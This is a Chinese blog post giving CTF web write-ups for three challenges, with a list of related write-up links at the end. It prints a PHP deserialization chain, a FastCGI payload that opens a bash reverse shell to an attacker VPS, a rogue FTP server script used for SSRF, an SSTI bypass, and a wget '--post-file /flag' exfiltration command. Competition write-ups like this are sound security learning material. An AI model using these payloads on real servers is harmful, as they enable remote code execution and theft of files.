陇原战”疫“ CTF web writeup

最新推荐文章于 2023-11-18 00:58:23 发布
最新推荐文章于 2023-11-18 00:58:23 发布
阅读量3.6k 收藏
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44502336/article/details/121210310
版权

eaaasyphp
这道题折磨死我了。首先是看到一段很简单的pop链,很简单,很开心,啪的一下很快啊,就造出了链子。

<?php
class Check {
    public static $str1 = false;
    public static $str2 = false;
}
class Esle {
    public function __wakeup()
    {
	    Check::$str1 = true;
    }
}
class Bypass {

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } 
        
    }
}
class Welcome {
    public function __invoke()
    {
        Check::$str2=true;
	return "Welcome" . $this->username;
    }
}
class Bunny {
    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}
class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}
$a=new Esle();
$b=new Bypass();
$b->str4=new Welcome;
$b->str4->username=new Bunny();
$b->str4->username->filename="daidai.php";
$c=serialize([$a,$b]);
echo $c;
?>

开开心心去打exp。
嗯?
怎么五百了

在这里插入图片描述

你咋了,你咋五百了。出事儿了~
嘤嘤嘤了属于是。
哎呀,然后就一直卡在这。直到s神和敏👴同时给我发了这个连接。
首先贴出大师傅的文章。谢谢大师傅
教你用 FTP SSRF 打穿内网
这里演示的是有file_put_contents,但是无法写入文件,这时候,我们就要使用ftp的被动模式入手,然后RCE
首先这道题前面让我们看phpinfo,可能就是为了告诉我们php-fpm,那我们就可以通过ftp的被动模式攻击内网的PHP-FPM。首先还是用Gopherus去生成payload
python gopherus.py –exploit fastcgi
填入一个目标主机已知的php文件,
这里填执行的命令,我们选择反弹shell
在这里插入图片描述
复制第一个_后面的内容

%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH95%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00_%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/VPS/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
然后在vps上搭建一个恶意的ftp服务器。

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n')
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n')
#Size /
conn.send(b'550 Could not get the file size.\n')
#EPSV (1)
conn.send(b'150 ok\n')
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2)
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

然后python3 evil_ftp.py
执行脚本
然后另外一个终端执行nc -lvp 2333
这时候修改自己的原来的exp

然后执行之后打出exp
/?code=a:2:{i:0;O:4:“Esle”:0:{}i:1;O:6:“Bypass”:1:{s:4:“str4”;O:7:“Welcome”:1:{s:8:“username”;O:5:“Bunny”:1:{s:8:“filename”;s:20:“ftp://aaa@vps:23/123”;}}}}&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH95%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00_%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/VPS/2333%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
这时候就能成功反弹shell到自己的vps。
在这里插入图片描述

magicMail
这道题比赛的时候0解。
打开这道题,发现是可以给服务器发送邮件。那我们在本地用python开个smtp服务器。
这道题是因为发送邮件这里存在一个模板注入,我们可以通过给我们自己发邮件的形式去触发这个模板注入,我们在这里输入payload之后,经过后台的模板处理,成功打出payload后,将结果发送于我们。
常规的使用{{config}}
请添加图片描述

{{1*2}}发送成功
可以看到vps接收之后变成2了。
请添加图片描述

但是想进行ssti却发现这个payload很难造。
绕过还是attr+16进制的绕过方法。
看到guokeya师傅的ssti payload u1s1 稍微看了一下才懂。
这里的16进制是识别\x后两位。
\x5f是_ \x6c 是l
第一个区间是__class__ 那就是()|attr(class)|attr(mro)
然后依次下去
请添加图片描述
拿到flag

checkin
打开先给了一个登录框,拿到一份go的源码
看着就像是有sql注入漏洞,还没搞过go下的mongodb注入(但不是关键)这道题的关键是wget外带注入
关键在这里
请添加图片描述

首先看exec.Command()
首先指定/bin/wget的路径,然后命令参数用QueryArray去让用户使用argv去可控。
然后去找到相关的绑定路由。
请添加图片描述

wget路由,好的,直接访问/wget看看argv能不能调用。
返回一个noting. 首先还是在服务器上nc监听端口。
然后打出
wget?argv=daidai&argv=–post-file&argv=/flag&argv=ip拿到flag
参考
教你用FTP SSRF打穿内网
guokeya师傅writeup

呆呆槑了
关注
专栏目录
ctf web5 练习_CTF-攻防世界-WEB新手练习区 Writeup(12题入门题)
weixin_33603656的博客
01-15 3570
注:作者是CTF初学者,边学习边记录,如有错误或疏漏请批评指正,也请各位大佬多多包涵。攻防世界-WEB新手练习区 12题入门题 Writeup(注意:攻防世界WEB题每次生成场景后,有时flag会改变,因此flag不同不要在意,主要是学习解题思路和方法)0X01view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。题目提示查看源码,鼠标右键不管用,用F12...
N1CTF WEB WriteUp
heySister
03-13 4419
77777 作为一个小白,瑟瑟发抖地选择了这道被解出次数最多的题目….emmm…还是有一些收获的。 首先题目给出了一些代码和一些信息: 信息是关于安装配置虚拟机的…和我之前配置环境的步骤,指令差不多…感觉应该没什么问题,就只是告诉我们服务器上有这个东西。 给出的代码就比较关键了。而且题目About 里说可以修改points ,告诉我们flag 是admin's password...
【*CTF web部分writeup】
weixin_45751765的博客
04-18 2762
1NDEXGrafanaLottoNotepro Grafana CVE-2021-43798 读到这些文件 一开始想的用脚本解密db文件里加过密的密码,但发现datasource是空的…. 回头过一下配置文件 过到一个明文密码 本来以为要在哪里getshell, 翻插件翻到mysql 试了一下默认的 成功添加数据源 更换数据源后 有个edit sql直接查询 Lotto 大致意思就是上传forecast猜 最后和lotto_result结果对比 审计到这很可疑的环境变量赋值并且有safe
实验吧 CTF 题目之 WEB Writeup 通关大全 – 4
DarkN0te
02-24 982
文章目录上传绕过题目链接题目描述解题思路NSCTF web200题目链接题目描述解题思路程序逻辑问题题目链接题目描述解题思路what a fuck!这是什么鬼东西?题目链接题目描述解题思路PHP大法题目链接题目描述解题思路这个看起来有点简单!题目链接题目描述解题思路貌似有点难题目链接题目描述解题思路头有点大题目链接题目描述解题思路猫抓老鼠题目链接题目描述解题思路看起来有点难题目链接题目描述解题思路...
BUGKUctf-web-writeup
weixin_30284355的博客
06-09 267
因为是利用word直接转换的,所以排版有点乱,找到了原有word,用markdown重写了遍。 地址在:http://www.zhengjim.com/2019/05/11/166.html 找到了个ctf平台。里面的web挺多的。终于将web题目写的差不多了。 Web 签到题 加群就可以了 Web2 直接F12就看到了 文件上传测试 Burp抓包 文件名改成 1.jpg.php 即可 ...
ctf web WriteUp1
weixin_44219914的博客
10-14 555
年纪大了,方法总结的东西不写下来一会儿就忘了 web2(bugku) & 佛说 – 白给(asuri) 网址链接: http://120.24.86.145:8002/web2/ 47.102.107.100:39002 直接按F12,隐藏在Elements里 Asuri另外一题白给2,按F12,Console里点击链接跳转 就能看到flag了 佛说 – 白给 3 网址链接:http:...
2018第二届强网杯线上赛ctf web writeup(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
本文主要涉及的是网络安全领域中的CTF(Capture The Flag)竞赛,特别是Web安全相关的挑战。在2018年的第二届强网杯线上赛中,存在一系列难度较大的Web题目,这些题目主要测试参赛者的Web安全技能,包括但不限于密码...
CTF-writeup
03-19
在这个CTF-writeup中,我们将主要探讨与JavaScript相关的知识点,这是一种广泛用于Web开发的编程语言,也是CTF比赛中的常见挑战类型。 JavaScript是互联网上动态内容的基础,它允许网页与用户进行交互,执行实时...
33c3 CTF web WriteUp
Bendawang's Blog
01-05 3125
33c3 CTF web WriteUp
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全Web安全是网络...
WriteUp-CTF-Web
最新发布
2201_75737040的博客
11-18 303
来源:攻防世界考点:php代码审计之弱类型比较工具:手工难度:⭐分析过程打开场景,分析代码构造payload:?
bugkuctf-web(Writeup)
凝聚力安全团队
11-07 3560
目录web2计算器计算器 web2 题目: http://123.206.87.240:8002/web2/ Writeup: #查看页面源代码 ctrl + U F12 view-source: 计算器 题目: http://123.206.87.240:8002/yanzhengma/ Writeup: 正确答案是两位数字,maxlength限制了我们输入的字数,只允许输入1位。 由于前端代码在我们浏览器加载的,我们可以随意控制前端代码,修改maxlength大一些,再输入正确答案,即可获取f
RoarCTF Web_Writeup
Vicl1fe的博客
10-23 277
https://blog.csdn.net/qq_42181428/article/details/102617137
BUGKU_CTF WEB(21-35) writeUP
热门推荐
单核CPU的小朋友的博客
10-31 4万+
第21题:秋名山老司机 根据题目要求可以看出题目要求在两秒内计算出div标签中给出的值。这里采用py传递value参数。通过post传递参数。session保持会话,从而拿到flag。 第22题:速度要快。 burp抓包发现一个response请求头。里面有一个flag属性。第一次判断是base64加密的。 观察注释。传post传margin,控制session保持flag不变。写python。...
Bugkuctf web writeup
k0sec的安全路
03-18 398
web2 writeup 访问http://123.206.87.240:8002/web2/ 一堆滑稽。。。 页面没有任何提示,查看一下源代码。点击鼠标右键,发现没有查看源码选项,正常情况下应该有。 猜测flag很可能在源代码中。 按F12: 很显然,flag KEY{Web-2-bugKssNNikls9100} 总结,查看源代码的几种方法: (1)F12 (2)Ctrl+U (3)在u...
CTF_论剑场 Web WriteUp(持续更新)
qq_41995976的博客
05-19 6565
文章目录web1web9流量分析web2web5web6web11web13日志审计web20 web1 利用的是变量覆盖漏洞 http://www.mamicode.com/info-detail-2314166.html payload:http://123.206.31.85:10001/?a=&c=aaaaa web9 题干: 要求你PUT一串信息"bugku" 才能获得flag...
实验吧 CTF 题目之 WEB Writeup 通关大全 - 1
DarkN0te
02-24 1002
文章目录概述Writeup简单的登录题后台登录加了料的报错注入认真一点!你真的会PHP吗利用intval函数溢出绕过用科学计数法构造0=0 概述 解除CTF也有很多年了,但是真正的将网上的题目通关刷题还是没有过的,同时感觉水平下降的太厉害,这两个月准备把网上目前公开有的CTF环境全部刷一遍,同时收集题目做为素材,为后面的培训及靶场搭建做好准备。本文是实验吧2018年7月8日前所有Web类的题目通关...
实验吧 CTF 题目之 WEB Writeup 通关大全 – 3
DarkN0te
02-24 1636
文章目录让我进去拐弯抹角Forms天网管理系统忘记密码了Once MoreGuess Next SessionFALSE 实验吧Web题目系列3 让我进去 题目链接 http://shiyanbar.com/ctf/1848 题目描述 相信你一定能拿到想要的 Hint:你可能希望知道服务器端发生了什么。。 格式:CTF{} 解题思路 用burpsuite抓包后,发现cookie里有一个字段s...
南邮CTF-WEB-write-up 教程详细解说
残阳泼茶香的博客
03-20 3468
单身一百年也没用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass check 起名字真难 密码重置 php 反序列化 sql injection 4 综合题 system SQL注入2 综合题2 注入实战1 密码重置2 ...
2018强网杯CTF Web挑战解析:绕过与解密
"这篇文档是关于2018年第二届强网杯线上赛CTF(Capture The Flag)的Web挑战的解题总结,主要涉及网络安全Web安全领域,适合CTF爱好者和网络安全学习者参考。文章包含了不同层次的题目解析,特别是其中的Web签到...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值